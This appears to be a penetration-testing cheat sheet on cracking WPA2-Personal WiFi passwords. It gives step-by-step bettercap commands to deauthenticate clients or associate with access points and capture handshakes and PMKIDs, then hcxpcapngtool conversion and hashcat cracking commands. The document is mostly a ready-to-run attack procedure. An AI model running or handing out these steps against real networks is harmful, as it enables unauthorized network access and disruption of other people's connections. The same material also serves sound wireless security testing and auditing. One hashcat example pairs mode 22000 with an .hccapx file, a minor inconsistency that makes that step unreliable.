WiFi - WPA2 (Personal)

• Authentication: PSK (4-way handshake)
• Cipher: CCMP/AES (avoid TKIP/mixed modes)

Vulnerabilities

Offline bruteforce

• Capture 4-way handshake
  • Listen for clients to connect to the WiFi AP and capture the 4-way handshake.
  • Trigger/spoof deauthentication to force clients to reconnect to the AP.
    • Does not work if PMF is enabled/required.
• EAPOL capture
  • Vulnerable routers will include the PMKID in the first EAPOL frame it sends an associating client. The PMKID can be cracked to discover the PSK
  • Works on WPA and WPA2 with PMKID roaming features enabled.
  • Listen to traffic in monitor mode
• FT (802.11r) handshakes capture.

4-way handshake capture w/ deauth

bettercap

Basic Usage

Sort AP's by # of clients connected.

set wifi.show.sort clients desc

Choose which AP to attack. Switch to its channel #.

wifi.recon.channel <ap_channel_#>

Choose a client of the AP and deauthenticate them

wifi.deauth e0:xx:xx:xx:xx:xx

If successful, bettercap will output [wifi.client_handshake] captured... messages. Convert the captured pcap into a file for hashcat to crack.

Convert client handshake pcap file to hashcat file

./hcxpcapngtool /root/bettercap-wifi-handshakes.pcap bettercap-wifi-handshakes.hccapx

Cracking the .pmkid with Hashcat

hashcat -a 0 -m 22000 -r rules\best64.rule wordlist.txt bettercap-wifi-handshakes.hccapx

• Hashcat
• WPA/Wi-Fi Wordlists

EAPOL Capture

https://hashcat.net/forum/thread-7717.html

bettercap

Basic Usage

Start associating with all clients on the same channel to obtain PMKIDs

wifi.assoc all

If successful, bettercap will output [wifi.client.handshake] captured... messages. Convert the captured pcap into a file for hashcat to crack.

Convert client handshake pcap file to hashcat file

./hcxpcapngtool -z bettercap-wifi-handshakes.pmkid /root/bettercap-wifi-handshakes.pcap

Cracking the .pmkid with Hashcat

hashcat -a 0 -m 22000 -r rules\best64.rule wordlist.txt bettercap-wifi-handshakes.pmkid

• Hashcat
• WPA/Wi-Fi Wordlists